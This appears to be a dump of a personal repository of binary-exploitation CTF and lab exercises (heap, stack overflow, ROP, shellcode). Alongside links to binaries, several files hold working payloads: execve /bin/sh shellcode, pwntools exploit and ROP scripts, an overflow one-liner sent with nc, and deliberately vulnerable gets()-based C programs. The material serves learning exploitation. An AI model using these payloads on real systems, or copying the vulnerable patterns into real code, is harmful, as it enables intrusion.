-------------------------------------------------------------------------------- /HEAP/HeapLAB/safe_unlink/assets/Image7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HeapLAB/safe_unlink/assets/Image7.png -------------------------------------------------------------------------------- /HEAP/HeapLAB/safe_unlink/assets/Image8.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HeapLAB/safe_unlink/assets/Image8.png -------------------------------------------------------------------------------- /HEAP/HeapLAB/safe_unlink/assets/shell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HeapLAB/safe_unlink/assets/shell.png -------------------------------------------------------------------------------- /Nightmare/beginnerRev/CSAW19-BELAF/beleaf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/Nightmare/beginnerRev/CSAW19-BELAF/beleaf -------------------------------------------------------------------------------- /Nightmare/stackOverflow/ASLR/CSAW16-WARMUP/exp1.txt: -------------------------------------------------------------------------------- 1 | AAAABBBBCCCCDDDD 2 | -------------------------------------------------------------------------------- /ROPemporium/CALLME/x64/encrypted_flag.dat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/ROPemporium/CALLME/x64/encrypted_flag.dat -------------------------------------------------------------------------------- /shellcodeHandbook/INTRODUCTION/function32: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/shellcodeHandbook/INTRODUCTION/function32 -------------------------------------------------------------------------------- /shellcodeHandbook/SHELLCODE/test_shellcode: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/shellcodeHandbook/SHELLCODE/test_shellcode -------------------------------------------------------------------------------- /HEAP/HeapLAB/fastbin_dup/assets/Imagen1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HeapLAB/fastbin_dup/assets/Imagen1.png -------------------------------------------------------------------------------- /HEAP/HeapLAB/fastbin_dup/assets/Imagen2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HeapLAB/fastbin_dup/assets/Imagen2.png -------------------------------------------------------------------------------- /HEAP/HeapLAB/fastbin_dup/assets/Imagen3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HeapLAB/fastbin_dup/assets/Imagen3.png -------------------------------------------------------------------------------- /HEAP/HeapLAB/fastbin_dup/assets/Imagen4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HeapLAB/fastbin_dup/assets/Imagen4.png -------------------------------------------------------------------------------- /HEAP/HeapLAB/fastbin_dup/assets/Imagen5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HeapLAB/fastbin_dup/assets/Imagen5.png -------------------------------------------------------------------------------- /HEAP/HeapLAB/fastbin_dup/assets/Imagen6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HeapLAB/fastbin_dup/assets/Imagen6.png -------------------------------------------------------------------------------- /HEAP/HeapLAB/fastbin_dup/assets/Imagen7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HeapLAB/fastbin_dup/assets/Imagen7.png -------------------------------------------------------------------------------- /HEAP/HeapLAB/house_of_orange/house_of_orange: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HeapLAB/house_of_orange/house_of_orange -------------------------------------------------------------------------------- /HEAP/HeapLAB/safe_unlink/assets/checksec.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HeapLAB/safe_unlink/assets/checksec.png -------------------------------------------------------------------------------- /Nightmare/stackOverflow/ASLR/CSAW16-WARMUP/payload.txt: -------------------------------------------------------------------------------- 1 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA @ 2 | -------------------------------------------------------------------------------- /Nightmare/stackOverflow/ASLR/tamu19_pwn3/pwn3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/Nightmare/stackOverflow/ASLR/tamu19_pwn3/pwn3 -------------------------------------------------------------------------------- /Nightmare/stackOverflow/BASIC/csaw18Boi/boi: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/Nightmare/stackOverflow/BASIC/csaw18Boi/boi -------------------------------------------------------------------------------- /ROP/ROPX64/MEMLEAK_DYNELF/x86xD/read_prueba: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/ROP/ROPX64/MEMLEAK_DYNELF/x86xD/read_prueba -------------------------------------------------------------------------------- /ROP/ROPX64/MEMLEAK_DYNELF/x86xD/read_prueba.c: -------------------------------------------------------------------------------- 1 | # include 2 | 3 | int main() 4 | { 5 | printf("hola"); 6 | return 0; 7 | } 8 | -------------------------------------------------------------------------------- /shellcodeHandbook/OVERFLOW/buffer.c: -------------------------------------------------------------------------------- 1 | int main() 2 | { 3 | int array[5]; 4 | int i; 5 | for (i=0;i<=255;i++){ 6 | array[i]=10; 7 | } 8 | } 9 | -------------------------------------------------------------------------------- /shellcodeHandbook/SHELLCODE/exit_notNULLS.asm: -------------------------------------------------------------------------------- 1 | section .text 2 | global _start 3 | 4 | _start: 5 | xor ebx,ebx 6 | mov al,1 7 | int 0x80 8 | -------------------------------------------------------------------------------- /shellcodeHandbook/SHELLCODE/exit_notNULLS.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/shellcodeHandbook/SHELLCODE/exit_notNULLS.o -------------------------------------------------------------------------------- /shellcodeHandbook/SHELLCODE/test_shellcode2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/shellcodeHandbook/SHELLCODE/test_shellcode2 -------------------------------------------------------------------------------- /HEAP/HeapLAB/unsafe_unlink/assets/vis_free.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HeapLAB/unsafe_unlink/assets/vis_free.png -------------------------------------------------------------------------------- /Nightmare/stackOverflow/ASLR/tu17_vulnchat/core: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/Nightmare/stackOverflow/ASLR/tu17_vulnchat/core -------------------------------------------------------------------------------- /Nightmare/stackOverflow/BASIC/Tamula19pwn1/pwn1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/Nightmare/stackOverflow/BASIC/Tamula19pwn1/pwn1 -------------------------------------------------------------------------------- /HEAP/HeapLAB/HeapLab - GLIBC Heap Exploitation.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HeapLAB/HeapLab - GLIBC Heap Exploitation.pdf -------------------------------------------------------------------------------- /HEAP/HeapLAB/challenge-fastbin_dup/fastbin_dup_2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HeapLAB/challenge-fastbin_dup/fastbin_dup_2 -------------------------------------------------------------------------------- /Nightmare/stackOverflow/ASLR/CSAW16-WARMUP/warmup: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/Nightmare/stackOverflow/ASLR/CSAW16-WARMUP/warmup -------------------------------------------------------------------------------- /Nightmare/stackOverflow/BASIC/Csaw18-GetIt/exp.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/Nightmare/stackOverflow/BASIC/Csaw18-GetIt/exp.txt -------------------------------------------------------------------------------- /Nightmare/stackOverflow/BASIC/Csaw18-GetIt/get_it: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/Nightmare/stackOverflow/BASIC/Csaw18-GetIt/get_it -------------------------------------------------------------------------------- /Nightmare/stackOverflow/BASIC/csaw17_pilot/exp.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/Nightmare/stackOverflow/BASIC/csaw17_pilot/exp.txt -------------------------------------------------------------------------------- /Nightmare/stackOverflow/BASIC/csaw17_pilot/pilot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/Nightmare/stackOverflow/BASIC/csaw17_pilot/pilot -------------------------------------------------------------------------------- /Nightmare/stackOverflow/BASIC/csaw18Boi/expboi.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/Nightmare/stackOverflow/BASIC/csaw18Boi/expboi.txt -------------------------------------------------------------------------------- /HEAP/HeapLAB/safe_unlink/assets/reflected_write.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HeapLAB/safe_unlink/assets/reflected_write.jpeg -------------------------------------------------------------------------------- /Nightmare/stackOverflow/ASLR/tu17_vulnchat/vuln-chat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/Nightmare/stackOverflow/ASLR/tu17_vulnchat/vuln-chat -------------------------------------------------------------------------------- /shellcodeHandbook/SHELLCODE/exit_shellcode_notNULLS: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/shellcodeHandbook/SHELLCODE/exit_shellcode_notNULLS -------------------------------------------------------------------------------- /HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen1.png -------------------------------------------------------------------------------- /HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen10.png -------------------------------------------------------------------------------- /HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen11.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen11.png -------------------------------------------------------------------------------- /HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen12.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen12.png -------------------------------------------------------------------------------- /HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen13.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen13.png -------------------------------------------------------------------------------- /HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen14.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen14.png -------------------------------------------------------------------------------- /HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen15.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen15.png -------------------------------------------------------------------------------- /HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen16.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen16.png -------------------------------------------------------------------------------- /HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen17.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen17.png -------------------------------------------------------------------------------- /HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen2.png -------------------------------------------------------------------------------- /HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen3.png -------------------------------------------------------------------------------- /HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen4.png -------------------------------------------------------------------------------- /HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen5.png -------------------------------------------------------------------------------- /HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen6.png -------------------------------------------------------------------------------- /HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen7.png -------------------------------------------------------------------------------- /HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen8.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen8.png -------------------------------------------------------------------------------- /HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen9.png -------------------------------------------------------------------------------- /Nightmare/stackOverflow/ASLR/tu17_vulnchat/noexplit.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/Nightmare/stackOverflow/ASLR/tu17_vulnchat/noexplit.txt -------------------------------------------------------------------------------- /Nightmare/stackOverflow/ASLR/tu18_shellaeasy/expgdb.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/Nightmare/stackOverflow/ASLR/tu18_shellaeasy/expgdb.txt -------------------------------------------------------------------------------- /Nightmare/stackOverflow/BASIC/picoctf18/buffer_of1/vuln: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/Nightmare/stackOverflow/BASIC/picoctf18/buffer_of1/vuln -------------------------------------------------------------------------------- /docker_suites/ubuntu20-pwndbg/mount/CALLME/x64/callme: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/docker_suites/ubuntu20-pwndbg/mount/CALLME/x64/callme -------------------------------------------------------------------------------- /Nightmare/stackOverflow/ASLR/tu18_shellaeasy/shella-easy: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/Nightmare/stackOverflow/ASLR/tu18_shellaeasy/shella-easy -------------------------------------------------------------------------------- /Nightmare/stackOverflow/BASIC/TokioW17-justdoit/exp2.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/Nightmare/stackOverflow/BASIC/TokioW17-justdoit/exp2.txt -------------------------------------------------------------------------------- /Nightmare/stackOverflow/BASIC/picoctf18/buffer_oc_0/vuln: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/Nightmare/stackOverflow/BASIC/picoctf18/buffer_oc_0/vuln -------------------------------------------------------------------------------- /Nightmare/stackOverflow/BASIC/TokioW17-justdoit/just_do_it: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/Nightmare/stackOverflow/BASIC/TokioW17-justdoit/just_do_it -------------------------------------------------------------------------------- /docker_suites/ubuntu20-pwndbg/mount/CALLME/x64/libcallme.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/docker_suites/ubuntu20-pwndbg/mount/CALLME/x64/libcallme.so -------------------------------------------------------------------------------- /Nightmare/stackOverflow/NXENABLED/bkp16_simplecalc/simplecalc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/Nightmare/stackOverflow/NXENABLED/bkp16_simplecalc/simplecalc -------------------------------------------------------------------------------- /Nightmare/stackOverflow/BASIC/Insomni2016-smartstove/smartstove: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/Nightmare/stackOverflow/BASIC/Insomni2016-smartstove/smartstove -------------------------------------------------------------------------------- /docker_suites/ubuntu20-pwndbg/mount/CALLME/x64/encrypted_flag.dat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/docker_suites/ubuntu20-pwndbg/mount/CALLME/x64/encrypted_flag.dat -------------------------------------------------------------------------------- /Nightmare/stackOverflow/BASIC/picoctf18/buffer_of1/sol: -------------------------------------------------------------------------------- 1 | python -c "import s 2 | truct;print(('A'*8)+('B'*8)+('C'*8)+('D'*8)+('E'*12)+(struct.pack('I', 0x80485cb)));" | ./vuln 3 | -------------------------------------------------------------------------------- /Nightmare/stackOverflow/DINAMIC-BOF/08-bof_dynamic/csawquals17_svc/svc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/Nightmare/stackOverflow/DINAMIC-BOF/08-bof_dynamic/csawquals17_svc/svc -------------------------------------------------------------------------------- /Nightmare/stackOverflow/BASIC/csaw18Boi/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | target=process('./boi') 4 | payload="0"*0x14 + p32(0xcaf3baee) 5 | target.send(payload) 6 | target.interactive() 7 | -------------------------------------------------------------------------------- /Nightmare/stackOverflow/DINAMIC-BOF/08-bof_dynamic/utc19_shellme/server: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/Nightmare/stackOverflow/DINAMIC-BOF/08-bof_dynamic/utc19_shellme/server -------------------------------------------------------------------------------- /Nightmare/stackOverflow/DINAMIC-BOF/08-bof_dynamic/csaw19_babyboi/baby_boi: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/Nightmare/stackOverflow/DINAMIC-BOF/08-bof_dynamic/csaw19_babyboi/baby_boi -------------------------------------------------------------------------------- /Nightmare/stackOverflow/DINAMIC-BOF/08-bof_dynamic/fb19_overfloat/overfloat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/Nightmare/stackOverflow/DINAMIC-BOF/08-bof_dynamic/fb19_overfloat/overfloat -------------------------------------------------------------------------------- /Nightmare/stackOverflow/DINAMIC-BOF/08-bof_dynamic/hs19_storytime/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/Nightmare/stackOverflow/DINAMIC-BOF/08-bof_dynamic/hs19_storytime/libc.so.6 -------------------------------------------------------------------------------- /Nightmare/stackOverflow/DINAMIC-BOF/08-bof_dynamic/hs19_storytime/storytime: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/Nightmare/stackOverflow/DINAMIC-BOF/08-bof_dynamic/hs19_storytime/storytime -------------------------------------------------------------------------------- /ROPemporium/SPLIT/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | system=p64(0x0000000000400560) 3 | ropRdi=p64(0x00000000004007c3) 4 | flag= p64(0x0000000000601060) 5 | padd="A"*40 6 | print(padd+ropRdi+flag+system) -------------------------------------------------------------------------------- /shellcodeHandbook/INTDIVERSION/EXP/direccionx86: -------------------------------------------------------------------------------- 1 | 0xffffcf98│+0x0014: 0xffffd02c → 0xffffd23e → "SHELL=/bin/bash" 2 | 3 | 0x0804920d <+123>: cmp eax,DWORD PTR [ebp-0x10] #dentro de valid_Serial 4 | 5 | -------------------------------------------------------------------------------- /Nightmare/stackOverflow/DINAMIC-BOF/08-bof_dynamic/csaw19_babyboi/libc-2.27.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/Nightmare/stackOverflow/DINAMIC-BOF/08-bof_dynamic/csaw19_babyboi/libc-2.27.so -------------------------------------------------------------------------------- /Nightmare/stackOverflow/DINAMIC-BOF/08-bof_dynamic/csawquals17_svc/libc-2.23.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/Nightmare/stackOverflow/DINAMIC-BOF/08-bof_dynamic/csawquals17_svc/libc-2.23.so -------------------------------------------------------------------------------- /Nightmare/stackOverflow/DINAMIC-BOF/08-bof_dynamic/fb19_overfloat/libc-2.27.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/Nightmare/stackOverflow/DINAMIC-BOF/08-bof_dynamic/fb19_overfloat/libc-2.27.so -------------------------------------------------------------------------------- /ROP/ROPX86/unprotected/a.out: -------------------------------------------------------------------------------- 1 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB 2 | -------------------------------------------------------------------------------- /Templates/patch.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | elf=ELF('./bin') 4 | # for key, address in elf.symbols.iteritems(): 5 | # print(key, hex(address)) 6 | elf.asm( elf.symbols['alarm'], 'ret') 7 | elf.save('./bin_patch') -------------------------------------------------------------------------------- /shellcodeHandbook/OVERFLOW/overflow.c: -------------------------------------------------------------------------------- 1 | void return_input (void) 2 | { 3 | char array[30]; 4 | gets(array); 5 | printf("%s\n",array); 6 | } 7 | 8 | main() 9 | { 10 | return_input(); 11 | return 0; 12 | } 13 | -------------------------------------------------------------------------------- /shellcodeHandbook/INTRODUCTION/function.c: -------------------------------------------------------------------------------- 1 | function(int a, int b) 2 | { 3 | int array[5]; 4 | } 5 | 6 | main() 7 | { 8 | function(1,2); 9 | printf("This is where the return address points"); 10 | 11 | } 12 | -------------------------------------------------------------------------------- /shellcodeHandbook/SHELLCODE/execve.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | int main() 4 | { 5 | char *happy[2]; 6 | happy[0]= "/bin/sh"; 7 | happy[1]=NULL; 8 | execve(happy[0],happy,NULL); 9 | 10 | } 11 | -------------------------------------------------------------------------------- /Nightmare/stackOverflow/DINAMIC-BOF/08-bof_dynamic/utc19_shellme/libc6_2.27-3ubuntu1_i386.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/Nightmare/stackOverflow/DINAMIC-BOF/08-bof_dynamic/utc19_shellme/libc6_2.27-3ubuntu1_i386.so -------------------------------------------------------------------------------- /PWNable/passcode/pasccode: -------------------------------------------------------------------------------- 1 | Now I can safely trust you that you have credential :) 2 | 3 | 0x08048639 <+48>: call 0x80484a0 <__isoc99_scanf@plt> 4 | 338150 5 | 13371337 6 | nos vamos a exit y ese exit retorna a esa direccion en la entrada got 7 | 8 | -------------------------------------------------------------------------------- /ROP/ROPX86/DEP_ASLR/sol: -------------------------------------------------------------------------------- 1 | $ gcc -m32 -fno-stack-protector -o level2 level1.c 2 | 3 | //habilito proteccion ASLR que rondomiza direcciones 4 | #!bash 5 | sudo -s 6 | echo 2 > /proc/sys/kernel/randomize_va_space 7 | exit 8 | 9 | 10 | 11 | 12 | -------------------------------------------------------------------------------- /MIPS/procedures1.asm: -------------------------------------------------------------------------------- 1 | .data 2 | message: .asciiz "Hola mundo.\nMi nombre es Ivan" 3 | 4 | .text 5 | 6 | .main: 7 | jal saludar 8 | li $v0,10 9 | syscall 10 | 11 | saludar: 12 | li $v0, 4 13 | la $a0, message 14 | syscall 15 | jr $ra -------------------------------------------------------------------------------- /ROP/64LinuxROP/victim.c: -------------------------------------------------------------------------------- 1 | #include 2 | int main() { 3 | char name[64]; 4 | printf("%p\n", name); // Print address of buffer. 5 | puts("What's your name?"); 6 | gets(name); 7 | printf("Hello, %s!\n", name); 8 | return 0; 9 | } 10 | -------------------------------------------------------------------------------- /HEAP/HeapLAB/src/demo_top_chunk.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main(int argc, char* argv[]) { 4 | 5 | void* a = malloc(9); 6 | 7 | malloc(1); 8 | malloc(0); 9 | 10 | malloc(24); 11 | malloc(25); 12 | 13 | return 0; 14 | } 15 | -------------------------------------------------------------------------------- /Nightmare/stackOverflow/BASIC/picoctf18/buffer_oc_0/reto: -------------------------------------------------------------------------------- 1 | Let's start off simple, can you overflow the right buffer in this program to get the flag? You can also find it in /problems/buffer-overflow-0_1_316c391426b9319fbdfb523ee15b37db on the shell server. Source. 2 | -------------------------------------------------------------------------------- /Nightmare/stackOverflow/BASIC/picoctf18/buffer_of1/reto: -------------------------------------------------------------------------------- 1 | Okay now you're cooking! This time can you overflow the buffer and return to the flag function in this program? You can find it in /problems/buffer-overflow-1_0_787812af44ed1f8151c893455eb1a613 on the shell server. Source. 2 | 3 | -------------------------------------------------------------------------------- /PWNable.tw/START/plan: -------------------------------------------------------------------------------- 1 | \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 #0x08048087son 20 nops para deslizarme 2 | 3 | 0x08048087 ->>> \x87\x80\x04\x80 4 | 5 | \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x87\x80\x04\x80 6 | -------------------------------------------------------------------------------- /MIPS/procedures2.asm: -------------------------------------------------------------------------------- 1 | .data 2 | 3 | .text 4 | 5 | .main: 6 | addi $a1,$zero,100 7 | addi $a2,$zero,150 8 | 9 | jal sumar 10 | 11 | li $v0,1 12 | addi $a0, $v1, 0 13 | syscall 14 | 15 | li $v0,10 16 | syscall 17 | 18 | sumar: 19 | add $v1, $a1,$a2 20 | jr $ra -------------------------------------------------------------------------------- /PWNable/final0/final0-cp.py: -------------------------------------------------------------------------------- 1 | set follow-fork-mode child 2 | python -c "print 'A'*512+'bbbbccccddddeeeeffffgggghhhhhiiii'" | nc 192.168.0.10 2995 3 | buscar un texto en libc: grep -P -a -b -o /bin/sh /libc.so.6 4 | grep -R -a -b -o /bin/sh /lib/libc.so.6 5 | pidof final0 6 | cat /proc/1697/maps 7 | 8 | -------------------------------------------------------------------------------- /Nightmare/stackOverflow/ASLR/CSAW16-WARMUP/solve.txt: -------------------------------------------------------------------------------- 1 | user@User-Pc:~/home/GIT/IVAN/Pwning/Nightmare/stackOverflow/CSAW16-WARMUP$ python -c 'print "0"*72 + "\x0d\x06\x40\x00\x00\x00\x00\x00"+"\x0d\x06\x40\x00\x00\x00\x00\x00"' |./warmup 2 | -Warm Up- 3 | WOW:0x40060d 4 | >flag{g0ttem_b0yz} 5 | Segmentation fault 6 | 7 | -------------------------------------------------------------------------------- /HEAP/HeapLAB/src/demo_unsortedbin.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main(int argc, char* argv[]) { 4 | void* a = malloc(0x88); 5 | void* b = malloc(0x88); 6 | 7 | free(b); 8 | 9 | b = malloc(0x88); 10 | malloc(0x18); 11 | 12 | free(a); 13 | free(b); 14 | 15 | return 0; 16 | } 17 | -------------------------------------------------------------------------------- /ROP/ROPX86/unprotected/sol: -------------------------------------------------------------------------------- 1 | 2 | root@kali:~/Desktop/ROPX86# (python -c "import struct;shellcode='\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80';print(shellcode +('A'*(140-len(shellcode)))+struct.pack('I',0xffffd210))"; cat )| ./level1 3 | id 4 | uid=0(root) gid=0(root) groups=0(root) 5 | -------------------------------------------------------------------------------- /common/commands3: -------------------------------------------------------------------------------- 1 | file [* | archivo] 2 | vim archivo 3 | man ascii 4 | hexdump -C archivo 5 | strings archivo 6 | objdump -d archivo 7 | objdump -x archivo | less 8 | gbd archivo 9 | set disassemble-flavor intel 10 | dissasemble main 11 | break *ADDRESS 12 | r test-key 13 | inforegisters (rsi) 14 | strace./archivo 15 | -------------------------------------------------------------------------------- /Nightmare/stackOverflow/ASLR/tamu19_pwn3/exp.py: -------------------------------------------------------------------------------- 1 | payload='' 2 | shellcode="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" 3 | offset=302 4 | buffAddr = "\xbe\xcc\xff\xff" 5 | padd='A'*(offset-len(shellcode)) 6 | 7 | payload=shellcode+padd+buffAddr 8 | 9 | print payload 10 | -------------------------------------------------------------------------------- /ROP/ROPX86/DEP_ASLR/level1.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | void vulnerable_function() { 6 | char buf[128]; 7 | read(STDIN_FILENO, buf, 256); 8 | } 9 | 10 | int main(int argc, char** argv) { 11 | vulnerable_function(); 12 | write(STDOUT_FILENO, "Hello, World\n", 13); 13 | } 14 | 